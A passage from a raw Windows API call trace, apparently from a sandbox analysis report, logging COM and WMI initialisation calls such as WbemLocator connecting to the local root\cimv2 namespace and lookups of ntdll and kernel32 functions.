pCid=0x6ebe30*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0083.449] WbemDefPath:IUnknown:Release (This=0xb6f610) returned 0x3 [0083.449] CoGetContextToken (in: pToken=0x6ebe88 | out: pToken=0x6ebe88) returned 0x0 [0083.449] CoGetContextToken (in: pToken=0x6ec290 | out: pToken=0x6ec290) returned 0x0 [0083.449] WbemDefPath:IUnknown:QueryInterface (in: This=0x60109c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ec320 | out: ppvObject=0x6ec320*=0x0) returned 0x80004002 [0083.449] WbemDefPath:IUnknown:Release (This=0x60109c0) returned 0x2 [0083.449] WbemDefPath:IUnknown:Release (This=0x60109c0) returned 0x1 [0083.449] CoGetContextToken (in: pToken=0x6ecc18 | out: pToken=0x6ecc18) returned 0x0 [0083.449] CoGetContextToken (in: pToken=0x6ecb78 | out: pToken=0x6ecb78) returned 0x0 [0083.449] WbemDefPath:IUnknown:QueryInterface (in: This=0x60109c0, riid=0x6ecc48*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ecc44 | out: ppvObject=0x6ecc44*=0x60109c0) returned 0x0 [0083.449] WbemDefPath:IUnknown:AddRef (This=0x60109c0) returned 0x3 [0083.449] WbemDefPath:IUnknown:Release (This=0x60109c0) returned 0x2 [0083.449] WbemDefPath:IWbemPath:SetText (This=0x60109c0, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0083.450] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6ed4d8 | out: puCount=0x6ed4d8*=0x2) returned 0x0 [0083.450] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6ed4d4*=0x0, pszText=0x0 | out: puBuffLength=0x6ed4d4*=0xf, pszText=0x0) returned 0x0 [0083.450] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6ed4d4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ed4d4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0083.450] CoGetObjectContext (in: riid=0x34e26c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ed488 | out: ppv=0x6ed488*=0xb51e34) returned 0x0 [0083.450] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6ed480 | out: pAptType=0x6ed480*=1) returned 0x0 [0083.450] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34e26b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ed484 | out: ppvObject=0x6ed484*=0x0) returned 0x80004002 [0083.450] IUnknown:Release (This=0xb51e34) returned 0x0 [0083.451] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ecdf0 | out: ppv=0x6ecdf0*=0x6010910) returned 0x0 [0083.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010910, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ed008 | out: ppvObject=0x6ed008*=0x0) returned 0x80004002 [0083.451] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6010910, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ed01c | out: ppvObject=0x6ed01c*=0x6010ba0) returned 0x0 [0083.451] WbemDefPath:IUnknown:Release (This=0x6010910) returned 0x0 [0083.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010ba0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ecc3c | out: ppvObject=0x6ecc3c*=0x6010ba0) returned 0x0 [0083.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010ba0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ecbf8 | out: ppvObject=0x6ecbf8*=0x0) returned 0x80004002 [0083.451] WbemDefPath:IUnknown:AddRef (This=0x6010ba0) returned 0x3 [0083.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010ba0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6ec554 | out: ppvObject=0x6ec554*=0x0) returned 0x80004002 [0083.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010ba0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6ec504 | out: ppvObject=0x6ec504*=0x0) returned 0x80004002 [0083.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010ba0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ec510 | out: ppvObject=0x6ec510*=0xb6f640) returned 0x0 [0083.451] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xb6f640, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6ec518 | out: pCid=0x6ec518*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0083.452] WbemDefPath:IUnknown:Release (This=0xb6f640) returned 0x3 [0083.452] CoGetContextToken (in: pToken=0x6ec570 | out: pToken=0x6ec570) returned 0x0 [0083.452] CoGetContextToken (in: pToken=0x6ec978 | out: pToken=0x6ec978) returned 0x0 [0083.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010ba0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eca08 | out: ppvObject=0x6eca08*=0x0) returned 0x80004002 [0083.452] WbemDefPath:IUnknown:Release (This=0x6010ba0) returned 0x2 [0083.452] WbemDefPath:IUnknown:Release (This=0x6010ba0) returned 0x1 [0083.452] CoGetContextToken (in: pToken=0x6ed300 | out: pToken=0x6ed300) returned 0x0 [0083.452] CoGetContextToken (in: pToken=0x6ed260 | out: pToken=0x6ed260) returned 0x0 [0083.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010ba0, riid=0x6ed330*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ed32c | out: ppvObject=0x6ed32c*=0x6010ba0) returned 0x0 [0083.452] WbemDefPath:IUnknown:AddRef (This=0x6010ba0) returned 0x3 [0083.452] WbemDefPath:IUnknown:Release (This=0x6010ba0) returned 0x2 [0083.452] WbemDefPath:IWbemPath:SetText (This=0x6010ba0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0083.452] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010ba0, puCount=0x6ed4b0 | out: puCount=0x6ed4b0*=0x2) returned 0x0 [0083.452] WbemDefPath:IWbemPath:GetText (in: This=0x6010ba0, lFlags=4, puBuffLength=0x6ed4ac*=0x0, pszText=0x0 | out: puBuffLength=0x6ed4ac*=0xf, pszText=0x0) returned 0x0 [0083.452] WbemDefPath:IWbemPath:GetText (in: This=0x6010ba0, lFlags=4, puBuffLength=0x6ed4ac*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ed4ac*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0083.453] CoGetObjectContext (in: riid=0x34e26c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ed4b0 | out: ppv=0x6ed4b0*=0xb51e34) returned 0x0 [0083.453] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6ed4a8 | out: pAptType=0x6ed4a8*=1) returned 0x0 [0083.453] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34e26b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ed4ac | out: ppvObject=0x6ed4ac*=0x0) returned 0x80004002 [0083.453] IUnknown:Release (This=0xb51e34) returned 0x0 [0083.453] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x6ed3bc | out: lpiid=0x6ed3bc) returned 0x0 [0083.453] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ed0d0 | out: ppv=0x6ed0d0*=0x6010a80) returned 0x0 [0083.455] GetCurrentThreadId () returned 0xb0c [0083.455] ResetEvent (hEvent=0xb8) returned 1 [0083.455] GetCurrentThreadId () returned 0xb0c [0083.455] GetCurrentThreadId () returned 0xb0c [0083.455] GetCurrentThreadId () returned 0xb0c [0083.455] GetCurrentThreadId () returned 0xb0c [0083.455] ResetEvent (hEvent=0xb8) returned 1 [0083.455] GetCurrentThreadId () returned 0xb0c [0083.455] GetCurrentThreadId () returned 0xb0c [0083.455] SetEvent (hEvent=0xbc) returned 1 [0083.455] SetEvent (hEvent=0xb8) returned 1 [0083.455] CloseHandle (hObject=0x2ac) returned 1 [0083.674] WbemLocator:IUnknown:QueryInterface (in: This=0x6010a80, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ed2e8 | out: ppvObject=0x6ed2e8*=0x0) returned 0x80004002 [0083.674] WbemLocator:IClassFactory:CreateInstance (in: This=0x6010a80, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ed2fc | out: ppvObject=0x6ed2fc*=0x6010d60) returned 0x0 [0083.674] WbemLocator:IUnknown:Release (This=0x6010a80) returned 0x0 [0083.674] WbemLocator:IUnknown:QueryInterface (in: This=0x6010d60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ecf1c | out: ppvObject=0x6ecf1c*=0x6010d60) returned 0x0 [0083.674] WbemLocator:IUnknown:QueryInterface (in: This=0x6010d60, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6eced8 | out: ppvObject=0x6eced8*=0x0) returned 0x80004002 [0083.674] WbemLocator:IUnknown:AddRef (This=0x6010d60) returned 0x3 [0083.674] WbemLocator:IUnknown:QueryInterface (in: This=0x6010d60, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6ec834 | out: ppvObject=0x6ec834*=0x0) returned 0x80004002 [0083.674] WbemLocator:IUnknown:QueryInterface (in: This=0x6010d60, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6ec7e4 | out: ppvObject=0x6ec7e4*=0x0) returned 0x80004002 [0083.674] WbemLocator:IUnknown:QueryInterface (in: This=0x6010d60, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ec7f0 | out: ppvObject=0x6ec7f0*=0x0) returned 0x80004002 [0083.674] CoGetContextToken (in: pToken=0x6ec850 | out: pToken=0x6ec850) returned 0x0 [0083.675] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0083.675] CoGetObjectContext (in: riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xb7359c | out: ppv=0xb7359c*=0xb51e28) returned 0x0 [0083.675] CoGetContextToken (in: pToken=0x6ecc58 | out: pToken=0x6ecc58) returned 0x0 [0083.675] WbemLocator:IUnknown:QueryInterface (in: This=0x6010d60, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ecce8 | out: ppvObject=0x6ecce8*=0x0) returned 0x80004002 [0083.675] WbemLocator:IUnknown:Release (This=0x6010d60) returned 0x2 [0083.675] WbemLocator:IUnknown:Release (This=0x6010d60) returned 0x1 [0083.676] CoGetContextToken (in: pToken=0x6ed2c8 | out: pToken=0x6ed2c8) returned 0x0 [0083.676] CoGetContextToken (in: pToken=0x6ed228 | out: pToken=0x6ed228) returned 0x0 [0083.676] WbemLocator:IUnknown:QueryInterface (in: This=0x6010d60, riid=0x6ed2f8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ed2f4 | out: ppvObject=0x6ed2f4*=0x6010d60) returned 0x0 [0083.676] WbemLocator:IUnknown:AddRef (This=0x6010d60) returned 0x3 [0083.676] WbemLocator:IUnknown:Release (This=0x6010d60) returned 0x2 [0083.694] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010ba0, puCount=0x6ed48c | out: puCount=0x6ed48c*=0x2) returned 0x0 [0083.694] WbemDefPath:IWbemPath:GetText (in: This=0x6010ba0, lFlags=8, puBuffLength=0x6ed488*=0x0, pszText=0x0 | out: puBuffLength=0x6ed488*=0xf, pszText=0x0) returned 0x0 [0083.694] WbemDefPath:IWbemPath:GetText (in: This=0x6010ba0, lFlags=8, puBuffLength=0x6ed488*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ed488*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0083.694] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ed364 | out: ppv=0x6ed364*=0x6010d70) returned 0x0 [0083.694] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6010d70, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ed3f8 | out: ppNamespace=0x6ed3f8*=0x601d544) returned 0x0 [0083.723] GetCurrentThreadId () returned 0xb0c [0083.723] ResetEvent (hEvent=0xb8) returned 1 [0083.723] GetCurrentThreadId () returned 0xb0c [0083.723] GetCurrentThreadId () returned 0xb0c [0083.723] GetCurrentThreadId () returned 0xb0c [0083.723] GetCurrentThreadId () returned 0xb0c [0083.723] ResetEvent (hEvent=0xb8) returned 1 [0083.723] GetCurrentThreadId () returned 0xb0c [0083.723] GetCurrentThreadId () returned 0xb0c [0083.724] SetEvent (hEvent=0xbc) returned 1 [0083.724] SetEvent (hEvent=0xb8) returned 1 [0083.724] CloseHandle (hObject=0x2c8) returned 1 [0083.726] GetCurrentThreadId () returned 0xb0c [0083.726] ResetEvent (hEvent=0xb8) returned 1 [0083.726] GetCurrentThreadId () returned 0xb0c [0083.726] GetCurrentThreadId () returned 0xb0c [0083.726] GetCurrentThreadId () returned 0xb0c [0083.726] GetCurrentThreadId () returned 0xb0c [0083.726] ResetEvent (hEvent=0xb8) returned 1 [0083.726] GetCurrentThreadId () returned 0xb0c [0083.726] GetCurrentThreadId () returned 0xb0c [0083.726] SetEvent (hEvent=0xbc) returned 1 [0083.726] SetEvent (hEvent=0xb8) returned 1 [0083.726] CloseHandle (hObject=0x2c8) returned 1 [0091.789] GetCurrentThreadId () returned 0xb0c [0091.789] ResetEvent (hEvent=0xb8) returned 1 [0091.789] GetCurrentThreadId () returned 0xb0c [0091.789] GetCurrentThreadId () returned 0xb0c [0091.789] GetCurrentThreadId () returned 0xb0c [0091.789] GetCurrentThreadId () returned 0xb0c [0091.789] ResetEvent (hEvent=0xb8) returned 1 [0091.789] GetCurrentThreadId () returned 0xb0c [0091.789] GetCurrentThreadId () returned 0xb0c [0091.789] SetEvent (hEvent=0xbc) returned 1 [0091.789] SetEvent (hEvent=0xb8) returned 1 [0091.790] CloseHandle (hObject=0x2cc) returned 1 [0091.793] GetCurrentThreadId () returned 0xb0c [0091.793] ResetEvent (hEvent=0xb8) returned 1 [0091.793] GetCurrentThreadId () returned 0xb0c [0091.793] GetCurrentThreadId () returned 0xb0c [0091.793] GetCurrentThreadId () returned 0xb0c [0091.793] GetCurrentThreadId () returned 0xb0c [0091.793] ResetEvent (hEvent=0xb8) returned 1 [0091.793] GetCurrentThreadId () returned 0xb0c [0091.793] GetCurrentThreadId () returned 0xb0c [0091.793] SetEvent (hEvent=0xbc) returned 1 [0091.793] SetEvent (hEvent=0xb8) returned 1 [0091.793] CloseHandle (hObject=0x2cc) returned 1 [0092.681] SysReAllocStringLen (in: pbstr=0x6ebd60*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x6ebd60*="ntdll.dll") returned 1 [0092.681] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0092.681] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0092.681] GetProcAddress (hModule=0x77c40000, lpProcName="EtwRegisterTraceGuidsW") returned 0x77c7f843 [0092.686] SysReAllocStringLen (in: pbstr=0x6ed0f0*=0x0, psz="Kernel32", len=0x8 | out: pbstr=0x6ed0f0*="Kernel32") returned 1 [0092.686] CharLowerBuffW (in: lpsz="Kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0092.686] GetModuleHandleW (lpModuleName="Kernel32") returned 0x76d30000 [0092.688] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadPreferredUILanguages") returned 0x76dc47a1 [0092.691] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadPreferredUILanguages") returned 0x76dd79e5 [0092.693] GetProcAddress (hModule=0x76d30000, lpProcName="LocaleNameToLCID") returned 0x76dc4801 [0092.696] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0092.720] GetCurrentThreadId () returned 0xb0c [0092.720] ResetEvent (hEvent=0xb8) returned 1 [0092.720] GetCurrentThreadId () returned 0xb0c [0092.720] GetCurrentThreadId () returned 0xb0c [0092.720] GetCurrentThreadId () returned 0xb0c [0092.720] GetCurrentThreadId () returned 0xb0c [0092.720] ResetEvent (hEvent=0xb8) returned 1 [0092.721] GetCurrentThreadId () returned 0xb0c [0092.721] GetCurrentThreadId () returned 0xb0c [0092.721] SetEvent (hEvent=0xbc) returned 1 [0092.721] SetEvent (hEvent=0xb8) returned 1 [0092.721] CloseHandle (hObject=0x2d4) returned 1 [0092.723] GetCurrentThreadId () returned 0xb0c [0092.723] ResetEvent (hEvent=0xb8) returned 1 [0092.723] GetCurrentThreadId () returned 0xb0c [0092.723] GetCurrentThreadId () returned 0xb0c [0092.723] GetCurrentThreadId () returned 0xb0c [0092.723] GetCurrentThreadId () returned 0xb0c [0092.723] ResetEvent (hEvent=0xb8) returned 1 [0092.723] GetCurrentThreadId () returned 0xb0c [0092.723] GetCurrentThreadId () returned 0xb0c [0092.723] SetEvent (hEvent=0xbc) returned 1 [0092.723] SetEvent (hEvent=0xb8) returned 1 [0092.723] CloseHandle (hObject=0x2d4) returned 1 [0092.725] WbemLocator:IUnknown:QueryInterface (in: This=0x601d544, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ed294 | out: ppvObject=0x6ed294*=0xb5a8c4) returned 0x0 [0092.725] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5a8c4, pProxy=0x601d544, pAuthnSvc=0x6ed2e4, pAuthzSvc=0x6ed2e0, pServerPrincName=0x6ed2d8, pAuthnLevel=0x6ed2dc, pImpLevel=0x6ed2cc, pAuthInfo=0x6ed2d0, pCapabilites=0x6ed2d4 | out: pAuthnSvc=0x6ed2e4*=0xa, pAuthzSvc=0x6ed2e0*=0x0, pServerPrincName=0x6ed2d8, pAuthnLevel=0x6ed2dc*=0x6, pImpLevel=0x6ed2cc*=0x2, pAuthInfo=0x6ed2d0, pCapabilites=0x6ed2d4*=0x1) returned 0x0 [0092.725] WbemLocator:IUnknown:Release (This=0xb5a8c4) returned 0x1 [0092.725] WbemLocator:IUnknown:QueryInterface (in: This=0x601d544, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ed288 | out: ppvObject=0x6ed288*=0xb5a8e4) returned 0x0 [0092.725] WbemLocator:IUnknown:QueryInterface (in: This=0x601d544, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ed284 | out: ppvObject=0x6ed284*=0xb5a8c4) returned 0x0 [0092.725] WbemLocator:IClientSecurity:SetBlanket (This=0xb5a8c4, pProxy=0x601d544, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0092.726] WbemLocator:IUnknown:Release (This=0xb5a8c4) returned 0x2 [0092.726] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x1 [0092.726] CoTaskMemFree (pv=0xb76e70) [0092.726] WbemLocator:IUnknown:Release (This=0x6010d70) returned 0x0 [0092.726] WbemLocator:IUnknown:QueryInterface (in: This=0x601d544, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ece84 | out: ppvObject=0x6ece84*=0xb5a8e4) returned 0x0 [0092.726] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ece40 | out: ppvObject=0x6ece40*=0x0) returned 0x80004002 [0092.726] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ecc5c | out: ppvObject=0x6ecc5c*=0x0) returned 0x80004002 [0092.727] WbemLocator:IUnknown:AddRef (This=0xb5a8e4) returned 0x3 [0092.727] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6ec79c | out: ppvObject=0x6ec79c*=0x0) returned 0x80004002 [0092.727] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6ec74c | out: ppvObject=0x6ec74c*=0x0) returned 0x80004002 [0092.728] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ec758 | out: ppvObject=0x6ec758*=0xb5a844) returned 0x0 [0092.728] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5a844, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6ec760 | out: pCid=0x6ec760*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0092.728] WbemLocator:IUnknown:Release (This=0xb5a844) returned 0x3 [0092.728] CoGetContextToken (in: pToken=0x6ec7b8 | out: pToken=0x6ec7b8) returned 0x0 [0092.728] CoGetContextToken (in: pToken=0x6ecbc0 | out: pToken=0x6ecbc0) returned 0x0 [0092.728] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 